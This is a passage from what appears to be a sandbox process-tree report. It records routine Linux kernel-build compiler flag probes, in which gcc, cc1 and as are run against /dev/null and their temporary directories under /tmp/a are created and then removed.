-mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wframe-address -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-frame-address\"; else echo \"\"; fi"3⤵PID:1752
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17524⤵PID:1753
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wframe-address -c -x c /dev/null -o /tmp/a/.tmp_1752/tmp4⤵PID:1754
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1752/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wframe-address "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/ccrAQbDN.s5⤵PID:1755
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1752/tmp /tmp/ccrAQbDN.s5⤵PID:1756
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1752/tmp /tmp/ccrAQbDN.s5⤵PID:1756
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1752/tmp /tmp/ccrAQbDN.s5⤵PID:1756
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1752/tmp /tmp/ccrAQbDN.s5⤵PID:1756
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17524⤵PID:1757
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wformat-truncation -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-format-truncation\"; else echo \"\"; fi"3⤵PID:1758
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17584⤵PID:1759
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wformat-truncation -c -x c /dev/null -o /tmp/a/.tmp_1758/tmp4⤵
- Writes file to tmp directory
PID:1760 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1758/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=1" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/ccw5TOyj.s5⤵PID:1761
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1758/tmp /tmp/ccw5TOyj.s5⤵PID:1762
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1758/tmp /tmp/ccw5TOyj.s5⤵PID:1762
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1758/tmp /tmp/ccw5TOyj.s5⤵PID:1762
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1758/tmp /tmp/ccw5TOyj.s5⤵
- Writes file to tmp directory
PID:1762
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17584⤵PID:1763
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wformat-overflow -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-format-overflow\"; else echo \"\"; fi"3⤵PID:1764
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17644⤵PID:1765
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wformat-overflow -c -x c /dev/null -o /tmp/a/.tmp_1764/tmp4⤵
- Writes file to tmp directory
PID:1766 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1764/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=1" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/cc3sDHMH.s5⤵PID:1767
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1764/tmp /tmp/cc3sDHMH.s5⤵PID:1768
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1764/tmp /tmp/cc3sDHMH.s5⤵PID:1768
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1764/tmp /tmp/cc3sDHMH.s5⤵PID:1768
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1764/tmp /tmp/cc3sDHMH.s5⤵PID:1768
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17644⤵PID:1769
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Waddress-of-packed-member -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-address-of-packed-member\"; else echo \"\"; fi"3⤵PID:1770
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17704⤵PID:1771
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Waddress-of-packed-member -c -x c /dev/null -o /tmp/a/.tmp_1770/tmp4⤵PID:1772
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1770/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Waddress-of-packed-member "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/ccWJA8gd.s5⤵
- Writes file to tmp directory
PID:1773
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1770/tmp /tmp/ccWJA8gd.s5⤵PID:1774
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1770/tmp /tmp/ccWJA8gd.s5⤵PID:1774
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1770/tmp /tmp/ccWJA8gd.s5⤵PID:1774
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1770/tmp /tmp/ccWJA8gd.s5⤵
- Writes file to tmp directory
PID:1774
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17704⤵PID:1775
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"--param=allow-store-data-races=0\"; else echo \"\"; fi"3⤵PID:1776
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17764⤵PID:1777
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" -c -x c /dev/null -o /tmp/a/.tmp_1776/tmp4⤵
- Writes file to tmp directory
PID:1778 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1776/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccGDRxXC.s5⤵PID:1779
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1776/tmp /tmp/ccGDRxXC.s5⤵PID:1780
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1776/tmp /tmp/ccGDRxXC.s5⤵PID:1780
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1776/tmp /tmp/ccGDRxXC.s5⤵PID:1780
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1776/tmp /tmp/ccGDRxXC.s5⤵
- Writes file to tmp directory
PID:1780
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17764⤵PID:1781
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -fno-allow-store-data-races -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-allow-store-data-races\"; else echo \"\"; fi"3⤵PID:1782
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17824⤵PID:1783
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" -fno-allow-store-data-races -c -x c /dev/null -o /tmp/a/.tmp_1782/tmp4⤵PID:1784
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17824⤵PID:1785
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wframe-larger-than=1024\"; else echo \"\"; fi"3⤵PID:1786
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17864⤵PID:1787
-
-
